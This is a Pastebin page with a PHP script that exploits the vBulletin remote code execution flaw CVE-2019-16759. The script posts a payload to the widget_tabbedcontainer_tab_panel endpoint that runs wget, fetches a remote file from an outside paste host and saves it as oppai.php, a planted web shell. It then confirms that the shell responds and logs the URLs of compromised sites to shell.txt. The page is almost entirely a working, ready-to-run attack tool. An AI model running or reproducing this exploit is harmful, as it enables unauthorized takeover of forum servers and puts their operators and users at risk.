ToKeiChun

vbulletin RCE CVE-2019-16759 bypass direct

Sep 22nd, 2020 (edited)
372
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.80 KB | None | 0 0
  1. <?php
  2. /*  vbulletin RCE CVE-2019-16759 bypass direct
  3. langsung crot
  4. Mantod ganteng
  5. source : https://pastebin.com/raw/eb9Frt8D
  6.  */
  7.  error_reporting(0);
  8.  echo " ~] Url to vBulletin : ";
  9. $url = trim(fgets(STDIN));
  10.         $d = "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo passthru('wget -S https://ghostbin.co/paste/g2gen/raw -O oppai.php');";
  11.     $vb     = curl_init();
  12.     curl_setopt($vb, CURLOPT_URL, $url . '/ajax/render/widget_tabbedcontainer_tab_panel');
  13.     curl_setopt($vb, CURLOPT_RETURNTRANSFER, 1);
  14.     curl_setopt($vb, CURLOPT_FOLLOWLOCATION, 1);
  15.     curl_setopt ($vb, CURLOPT_SSL_VERIFYPEER, 0);
  16.     curl_setopt ($vb, CURLOPT_SSL_VERIFYHOST, 0);
  17.         curl_setopt($vb, CURLOPT_TIMEOUT, 10);
  18.     curl_setopt($vb, CURLOPT_POSTFIELDS, $d);
  19.     $memek = curl_exec($vb);
  20.     curl_close($vb);
  21.     $tempek = curl_init();
  22.     curl_setopt($tempek, CURLOPT_URL, $url . '/oppai.php');
  23.     curl_setopt($tempek, CURLOPT_RETURNTRANSFER, 1);
  24.     curl_setopt($tempek, CURLOPT_FOLLOWLOCATION, 1);
  25.     $pu    = curl_exec($tempek);
  26.     $bjirr = curl_getinfo($tempek, CURLINFO_HTTP_CODE);
  27.     curl_close($tempek);
  28.     if ($bjirr == 200) {
  29.         echo "$url saved (shell.txt)\n";
  30.         $save = 'shell.txt';
  31.             $seve = fopen($save, 'a+') or die('Cannot open file:  '.$save);
  32.             $data = $url . '/oppai.php';
  33.             fwrite($seve, "\n".$data);
  34.             fclose($seve);
  35.     } else if ($bjirr == 404) {
  36.         echo "not vuln\n";
  37.     }
  38.     else if ($bjirr == 403) {
  39.         echo "not vuln\n";
  40.     }
  41.     else if ($bjirr == 400) {
  42.         echo "not vuln\n";
  43.     }
  44.     else if ($bjirr == 500) {
  45.         echo "not vuln\n";
  46.     }
  47.     else if ($bjirr == 301) {
  48.         echo "not vuln\n";
  49.     }
  50.     else if ($bjirr == 503) {
  51.         echo "not vuln\n";
  52.     }
  53.     ?>
Add Comment
Please, Sign In to add comment